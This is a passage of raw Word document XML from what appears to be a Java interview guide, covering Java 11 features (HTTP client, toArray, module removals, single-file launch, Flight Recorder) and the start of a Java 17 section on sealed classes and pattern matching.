          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpResponse</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respons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lie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en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que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ttpResponse</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BodyHandle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ofString</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3235A1" w14:textId="0B5AFED3" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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035491"/>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spons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ody</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0BD43" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="05596E98">
          <v:rect id="_x0000_i1782" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="188978F3" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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4. Collection.toArray(IntFunction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1D24C"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New method to convert a collection to an array using a generator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A08BF35" w14:textId="77777777" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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241066"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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lis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f</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C"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F3FA1C" w14:textId="11C7591E" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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241066"/>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a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Array</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w</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846D83E" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="52F47783">
          <v:rect id="_x0000_i1783" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E26A50" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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5. Notable Removals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291543D9"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Java EE and CORBA Modules were removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8ABEF"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E.g., Removed: javax.xml.bind, javax.activation, java.se.ee, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648A9F8" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="0799C292">
          <v:rect id="_x0000_i1784" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD6722" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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6. Launch Single-File Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31607B67" w14:textId="066BFA23" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>You can run a .java file directly without compiling it manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AF1F6"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java HelloWorld.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD15882" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful for quick scripts and testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D73E0" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="30CA16AF">
          <v:rect id="_x0000_i1785" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9353EE" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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7. Flight Recorder and Mission Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07BF88"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JDK Flight Recorder and Java Mission Control are now part of the JDK for better performance monitoring and diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B97BB" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="53D50187">
          <v:rect id="_x0000_i1786" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="560893CF" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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97"/>
        <w:gridCol w:w="4038"/>
      </w:tblGrid>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="5C72A807" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="221B52DA" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D464931" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="7925D543" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A4FC78"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var in Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15765EF7"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Enables use of var in lambda parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="39D1C025" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B7359A3"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New String Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53428413"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Utility methods like isBlank(), lines()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="7632220C" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EC50CDB"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Standard HTTP Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="288AF6FD"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Simplified modern HTTP communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="2DFCE4FB" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C5113E7"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Collection.toArray() Overload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D757456"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Converts collections to arrays efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="77C5538D" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E92D93"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Removed Deprecated Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="618649AD"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Java EE/CORBA APIs removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="4C88FB33" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68234307"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Run .java file directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BCF58A8" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Java source code launcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10CF2F0F" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="0011489C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABB189E" w14:textId="77777777" w:rsidR="000F0F96" w:rsidRPr="00CE4B95" w:rsidRDefault="000F0F96" w:rsidP="0011489C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A4C343" w14:textId="77777777" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="00E90957">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A3ACD" w14:textId="569EA8CF" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="00032852" w:rsidP="00032852">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="_Toc196307731"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 17 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w14:paraId="341BFEFD" w14:textId="1EF7D471" w:rsidR="00781DBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00781DBE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="252" w:name="_Toc196307732"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 17 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:p w14:paraId="3111ECE7" w14:textId="3C698953" w:rsidR="00781DBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00781DBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4C67C6" w14:textId="40E798C3" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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Java 17, released in September 2021, is an LTS (Long-Term Support) version like Java 11 and Java 8. It includes many enhancements, new features, and deprecations/removals aimed at improving performance, security, and developer productivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435D0DA" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2C71AC2A">
          <v:rect id="_x0000_i1787" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99FE55" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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1. Sealed Classes (Standard Feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BED321"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Sealed classes restrict which classes can extend or implement them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7873C" w14:textId="77777777" w:rsidR="008B0EE9" w:rsidRPr="00CE4B95" w:rsidRDefault="008B0E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084032"/>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eale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Vehicle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> permits </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ca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Bik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ECBE629" w14:textId="77777777" w:rsidR="008B0EE9" w:rsidRPr="00CE4B95" w:rsidRDefault="008B0E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084032"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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a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xtend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Vehic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FC646B8" w14:textId="73946A34" w:rsidR="008B0EE9" w:rsidRPr="00CE4B95" w:rsidRDefault="008B0E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084032"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Bik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xtend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Vehic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C040272" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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Use Case: Controlled inheritance for security and design clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE9A6C" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1FE68FCA">
          <v:rect id="_x0000_i1788" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6CDE3" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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2. Pattern Matching for instanceof (Standard Feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A58790"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Simplifies type checks and casting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADC0EA" w14:textId="77777777" w:rsidR="007D394E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D39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9911025"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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obj </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>instanceo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9CE8F1F" w14:textId="77777777" w:rsidR="007D394E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D39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991102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LowerCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CDAB5" w14:textId="3FA05C8D" w:rsidR="007D394E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D39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9911025"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8BE056" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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Cleaner and safer casting logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A29FF5F" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6B270BA0">
